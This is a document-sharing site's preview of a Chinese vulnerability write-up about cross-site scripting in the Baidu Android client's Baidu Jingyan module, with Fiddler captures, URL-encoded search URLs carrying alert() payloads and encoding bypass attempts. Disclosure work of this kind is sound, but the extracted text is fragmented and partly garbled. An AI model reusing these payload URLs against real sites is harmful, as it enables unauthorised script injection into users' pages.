百度android客戶端百度經驗模塊輸出內容未過濾導致xss_第1頁
百度android客戶端百度經驗模塊輸出內容未過濾導致xss_第2頁
百度android客戶端百度經驗模塊輸出內容未過濾導致xss_第3頁
百度android客戶端百度經驗模塊輸出內容未過濾導致xss_第4頁
百度android客戶端百度經驗模塊輸出內容未過濾導致xss_第5頁
已閱讀5頁,還剩10頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

1、網上漏洞驗證1)第一個payload 返回界面+第一個payload 返回界面:百度android 客戶端輸出內容未過濾導致 xss漏洞點在在百度經驗模塊,文章內容為過濾評價:低位,因為擴大攻擊范圍需要百度經驗發(fā)帖,同時首個 xss 發(fā)現(xiàn)非我,分析漏洞發(fā)現(xiàn)者基礎上,進一步發(fā)現(xiàn)新的 xss 觸發(fā)點。2018 年 11 月 26 日星期一在網上找到的百度 Xss-payload:1/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF& ms=12/from=844b/s?wo

2、rd=%E4%BF%AE%E6%94%B9alert%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86&sa=ts_1&ts=4352154&t_kt=0&ie=utf- 8&rsv_t=2715%252BTiab2gfmFre7D4LrEOc0XugajZp1NDgftJON9ulh2LOkP%252Fxj 5szLw&ms=1&rsv_pq=8150081601348093015&ss=100&tj=1&rq=alert%28%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&rqlang=zh&rsv_sug4=4145&oq

3、=alert%28%E 5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF漏洞分析+發(fā)現(xiàn)新的 xss 觸發(fā)點:一1) View-source:/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&ms=12) 查看源碼,找到彈出的字符串:“你好,2017“二 復制出 url,并訪問以上地址全部來指向百度經驗的一篇文章:0/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%

4、40iphone 24_70.0/b 1&tj=travel2_4_0_10_l3&wd=&eqid=897e95ac4d9a6800100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKv jBQPf4-msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogig1/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l3

5、&wd=&eqid=897e95ac4d9a6800100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKvD7ix16xSlXgo5DsX msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogig2/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l4&wd=&eqid=897e95ac4d9a6800100000035b

6、fb5dfa&w_qd=IlPT2AEptyoA_yi9IE jBQPf4-msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogih rl-link-data-url=/album/29697b9173ce6dab23/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l4&wd=&eqid=897e95ac4d9a6800

7、100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKvD7ix16xSlXgo5DsX msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogih點擊全文閱讀,跳轉到了這里:/article/29697b9173ce6dab21de3c5d.html在文中,找到了第一次彈的字符找到了第二次彈的字符發(fā)現(xiàn)是一篇 js alert 教程,此時想到 作者是如何進一步利用的?一先查看文章中涉及的 xss 語句,源碼發(fā)現(xiàn)并未過濾,初步假設:只要能訪問到本篇文章,點擊后就可以觸發(fā)二文章標題出自百度經驗alert(彈

8、出消息對話框)的用法想到剛才搜索框先輸入 1/search?word=+搜索內容構造payload:一/search?word=alert(彈出消息對話框)的用法但發(fā)現(xiàn)百度用了模糊搜索search?word=需要找到百度不是模糊搜索,直接可以跳轉到此頁面,驗證了之前的理論,點擊指定頁面,頁面中會包含此界面 id 值,只要文章標題+id 值,應該可以觸發(fā) xss抓到的包 url 解碼:/s?ie=utf- 8&f=8&rsv_bp=1&tn=baidu&wd=a

9、lert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86)%E7%9A%84%E7%94%A8%E6%B3%95&oq=alert(%25E5%25BC%25B9%2 5E5%2587%25BA%25E6%25B6%2588%25E6%2581%25AF%25E5%25AF%25B9%25E8%25AF%259D%25E6%25A1%2586)%25E7%259A%2584%25E7%2594%25A8%25E6%25B3%2595&rsv_pq=ac6e44ab00012e58&rsv_t=932eVtKEdFu

10、FLAxv9IoyaMKORMC2cFYeB3TUcMxjAKct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0很好” alert( “,為過濾,解析 url 編碼alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86)%E7%9A%84%E7%94%A8%E6%B3%95解碼后:2url 雙編碼如下是分析漏洞點的測試步驟,省略眾多測試截圖,因為全部失敗。Payload:/s?ie=utf-8&f=8&rsv_bp=1&tn=b

11、aidu&wd=alert( 彈出消息對話框)&oq=a alert(彈出消息對話框)&rsv_pq=ac6e44ab00012e58&rsv_t=932eVtKEdFuFLAxv9IoyaMKORMC2cFYeB3TUcMx jAKct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0拆分每個參數,方便去掉多余參數漏洞復現(xiàn) Fiddler 開啟抓包,從百度首頁搜索 :alert(彈出消息對話框)的用法二/s?ie=utf-8&mod=1&isbd=1&isid=ABD3E7801A491595&ie=utf-8&

12、f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8% sv_sid=1427_25809_21100_26350_27509&_ss=1&clist=&hsug=&csor=17&pstg=2&_cr1=31751去掉:&oq=alert(彈出消息對話框) Payload:/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=alert(彈出消息對話)&rsv_pq=ac6e44ab00012e58&rsv_

13、t=932eVtKEdFuFLAxv9IoyaMKORMC2cFYeB3TUcMxjA Kct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0訪問后未觸發(fā) xss此 url 的參數無法利用,繼續(xù)抓包/link?url=0ko1NVsDLCTL4xanS9o8YZGlEhBGWK_6te0ZBtY6cEJ9hFT8bhHg7XgkE6cQC_v訪問后會跳轉到:發(fā)現(xiàn)直接可以跳轉到此頁面,驗證了之前的理論,點擊指定頁面,頁面中會包含此界構造payload:一/link?wd= a

14、lert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF訪問返回:構造失敗二剛才抓包時,發(fā)現(xiàn) s 參數于是:url 拼接 link 改成 s/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&e游覽器模擬 andriodxss 觸發(fā)成功漏洞問題:Andriod 客戶端輸出頁面時內容未過濾。漏洞挖掘總結:1)從百度首頁搜索 標題2)3)4)分析數據/link?url=an3YJzaNgkZVM6R7fUJrfbqe-5.構造paylaod:htt

15、ps://s?wd=alert(彈出消息&eqid=b3b09c9c0000993b000000025bfba9d4游覽器模擬 andriod進一步驗證是標題未過濾導致 xss 還是內容未過濾導致 xss:在百度經驗找到了另一篇含有 xss 的代碼/article/90808022e075f5fd90c80f75.htmlsVNxvQOLkyChU_mIn5NSP9HJyaq4Sfnt2lUyfMaOheuUlHeDSiDc89X2ESQFoG2cKfbvb2uZ nk3j3B7DJS&wd=&eqid=b3b09c9c0000993b000000025bfba9d4標題:雜談繞過 WAFWeb 應用涉及的代碼:通過上面抓包修改參數模擬 android 測試后無法觸發(fā):/s?wd=%e6%9d%82%e8%b0%88%e7%bb%95%e8%bf%87WAFWeb%e5%ba%94%e7%94%a8%e9%98%b2%e7%81%ab%e5%a2%99&eqid=d6786e2800011f1f000000025bfbad12會重新跳轉到如下界面:驗證結論:分析后發(fā)現(xiàn)還是需要標題中帶有英文字母比如alert, 才能進到指定頁面,進一步觸發(fā)頁面中的

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論